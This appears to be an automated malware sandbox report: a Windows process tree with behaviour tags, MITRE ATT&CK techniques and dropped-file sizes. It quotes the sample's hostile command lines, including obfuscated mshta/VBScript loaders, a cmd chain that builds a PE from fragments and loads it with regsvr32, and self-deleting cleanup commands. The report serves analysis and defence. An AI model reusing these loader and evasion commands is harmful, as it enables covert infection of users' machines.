C:\Users\Admin\AppData\Local\Temp\872E.exeC:\Users\Admin\AppData\Local\Temp\872E.exe1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\8F9B.exeC:\Users\Admin\AppData\Local\Temp\8F9B.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 8F9B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8F9B.exe" & del C:\ProgramData\*.dll & exit2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 8F9B.exe /f3⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
-
-
-
C:\Users\Admin\AppData\Local\Temp\A008.exeC:\Users\Admin\AppData\Local\Temp\A008.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UE77B.tmp\A008.tmp"C:\Users\Admin\AppData\Local\Temp\is-UE77B.tmp\A008.tmp" /SL5="$301DE,506127,422400,C:\Users\Admin\AppData\Local\Temp\A008.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-F89RU.tmp\dqksjhàà(àç.exe"C:\Users\Admin\AppData\Local\Temp\is-F89RU.tmp\dqksjhàà(àç.exe" /S /UID=rec73⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe"C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe" /VERYSILENT4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0PR4T.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-0PR4T.tmp\irecord.tmp" /SL5="$202BE,6139911,56832,C:\Program Files\Windows NT\AMKXIJNLTQ\irecord.exe" /VERYSILENT5⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\recording\i-record.exe"C:\Program Files (x86)\recording\i-record.exe" -silent -desktopShortcut -programMenu6⤵
- Loads dropped DLL
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1b-a15d3-179-66985-985400ac56f61\Juxapivowae.exe"C:\Users\Admin\AppData\Local\Temp\1b-a15d3-179-66985-985400ac56f61\Juxapivowae.exe"4⤵
- Checks computer location settings
-
-
C:\Users\Admin\AppData\Local\Temp\6f-56385-1b1-67283-085ed03c7529c\Gutoshehishy.exe"C:\Users\Admin\AppData\Local\Temp\6f-56385-1b1-67283-085ed03c7529c\Gutoshehishy.exe"4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ABFF.exeC:\Users\Admin\AppData\Local\Temp\ABFF.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: Close( CREATEOBject ( "WscRIPT.ShELL"). RUN ( "CMD /Q /c TYpE ""C:\Users\Admin\AppData\Local\Temp\ABFF.exe"" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if """"=="""" for %C in ( ""C:\Users\Admin\AppData\Local\Temp\ABFF.exe"" ) do taskkill /im ""%~NXC"" /F " , 0 , True ))2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYpE "C:\Users\Admin\AppData\Local\Temp\ABFF.exe" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if ""=="" for %C in ( "C:\Users\Admin\AppData\Local\Temp\ABFF.exe" ) do taskkill /im "%~NXC" /F3⤵
-
C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe..\O5g~YGI.Exe -PkmgBRfy~iqG1d4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScriPt: Close( CREATEOBject ( "WscRIPT.ShELL"). RUN ( "CMD /Q /c TYpE ""C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe"" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if ""-PkmgBRfy~iqG1d ""=="""" for %C in ( ""C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe"" ) do taskkill /im ""%~NXC"" /F " , 0 , True ))5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYpE "C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe" > ..\O5G~YGI.EXe &&sTaRT ..\O5g~YGI.Exe -PkmgBRfy~iqG1d &if "-PkmgBRfy~iqG1d "=="" for %C in ( "C:\Users\Admin\AppData\Local\Temp\O5G~YGI.EXe" ) do taskkill /im "%~NXC" /F6⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRiPt: CLoSe( creATEOBjECT ( "WSCRipt.sHEll" ). RUN("CMD.eXE /q /c EchO | sET /p = ""MZ"" >fSZFXGIh.6E5 & cOpy /Y /b FSZFXGIH.6E5 + 9nS3MpMF.c_ + 7zTI.ToG + FUJSu6Z9.OXP +TGA6SM.I + E6uu.Yr ..\Pey9.WY & sTarT regsvr32 ..\PEY9.wY /s & dEL /q * " , 0 , TRUe ) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c EchO | sET /p = "MZ" >fSZFXGIh.6E5 & cOpy /Y /b FSZFXGIH.6E5 + 9nS3MpMF.c_+ 7zTI.ToG + FUJSu6Z9.OXP +TGA6SM.I + E6uu.Yr ..\Pey9.WY & sTarT regsvr32 ..\PEY9.wY /s & dEL /q *6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EchO "7⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>fSZFXGIh.6E5"7⤵
-
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 ..\PEY9.wY /s7⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "ABFF.exe" /F4⤵
- Kills process with taskkill
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3280 -s 23402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1836 -s 17682⤵
- Program crash
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File and Directory Permissions Modification
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
452KB
-
Filesize
1.0MB
-
Filesize
108KB
-
Filesize
36KB
-
Filesize
5.0MB
-
Filesize
4KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
124KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
92KB
-
Filesize
88KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
1.0MB
-
Filesize
372KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
452KB
-
Filesize
4KB
-
Filesize
1.6MB
-
Filesize
304KB
-
Filesize
452KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
572KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
1.1MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
628KB
-
Filesize
5.3MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
5.4MB
-
Filesize
568KB
-
Filesize
5.3MB
-
Filesize
628KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
5.3MB
-
Filesize
628KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
6.0MB
-
Filesize
1.6MB